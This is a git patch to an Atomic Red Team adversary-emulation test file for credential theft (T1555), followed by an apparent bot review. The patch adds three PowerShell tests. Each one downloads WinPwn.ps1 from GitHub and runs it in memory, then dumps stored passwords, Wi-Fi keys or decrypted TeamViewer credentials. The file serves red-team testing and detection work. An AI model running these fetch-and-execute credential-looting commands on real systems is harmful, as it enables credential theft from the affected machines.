From b384c8b7abf8d9953f001fc360997d64f3942568 Mon Sep 17 00:00:00 2001
From: tlor89 <60741301+tlor89@users.noreply.github.com>
Date: Thu, 12 May 2022 20:20:49 -0500
Subject: [PATCH] Update T1555.yaml (#1948)
* Update T1555.yaml
Loot local Credentials - Invoke-WCMDump technique via function of WinPwn
Loot local Credentials - Wifi Credentials technique via function of WinPwn
Loot local Credentials - Decrypt Teamviewer Passwords technique via function of WinPwn
* Update T1555.yaml
added name: powershell
* Update T1555.yaml
Co-authored-by: Carrie Roberts
---
 atomics/T1555/T1555.yaml | 33 +++++++++++++++++++++++++++++++++
 1 file changed, 33 insertions(+)
diff --git a/atomics/T1555/T1555.yaml b/atomics/T1555/T1555.yaml
index c6338e2c..683ec9b9 100644
--- a/atomics/T1555/T1555.yaml
+++ b/atomics/T1555/T1555.yaml
@@ -69,3 +69,36 @@ atomic_tests:
 elevation_required: false
 command: |
 vaultcmd /listcreds:"Web Credentials" /all
+- name: WinPwn - Loot local Credentials - lazagne
+ description: |-
+ The [LaZagne project](https://github.com/AlessandroZ/LaZagne) is an open source application used to retrieve lots of passwords stored on a local computer.
+ Each software stores its passwords using different techniques (plaintext, APIs, custom algorithms, databases, etc.).
+ This tool has been developed for the purpose of finding these passwords for the most commonly-used software
+ supported_platforms:
+ - windows
+ executor:
+ command: |-
+ $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
+ iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
+ lazagnemodule -consoleoutput -noninteractive
+ name: powershell
+- name: WinPwn - Loot local Credentials - Wifi Credentials
+ description: Loot local Credentials - Wifi Credentials technique via function of WinPwn
+ supported_platforms:
+ - windows
+ executor:
+ command: |-
+ $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
+ iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
+ wificreds -consoleoutput -noninteractive
+ name: powershell
+- name: WinPwn - Loot local Credentials - Decrypt Teamviewer Passwords
+ description: Loot local Credentials - Decrypt Teamviewer Passwords technique via function of WinPwn
+ supported_platforms:
+ - windows
+ executor:
+ command: |-
+ $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
+ iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
+ decryptteamviewer -consoleoutput -noninteractive
+ name: powershell
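Review bot: The three new `command` blocks pin only the first stage: `WinPwn.ps1` is fetched at commit `121dcee26a7aca368821563cbe92b2b5638c5773`, while `$S3cur3Th1sSh1t_repo` is set to the unpinned account root, so anything the script later downloads through that variable (LaZagne for `lazagnemodule`, presumably; WinPwn.ps1 is not visible here) can change without this file changing. The tests also write whatever credentials they recover to the console via `-consoleoutput`, which an execution log or transcript would capture. I would say both in each `description`, e.g. `Downloads and runs WinPwn.ps1 in memory; further modules are fetched unpinned from $S3cur3Th1sSh1t_repo and recovered secrets are printed to the console.`, and state `elevation_required` explicitly in each `executor` as the preceding vaultcmd test does. The Wifi and Teamviewer descriptions only repeat the test name and give an analyst nothing to build a detection on.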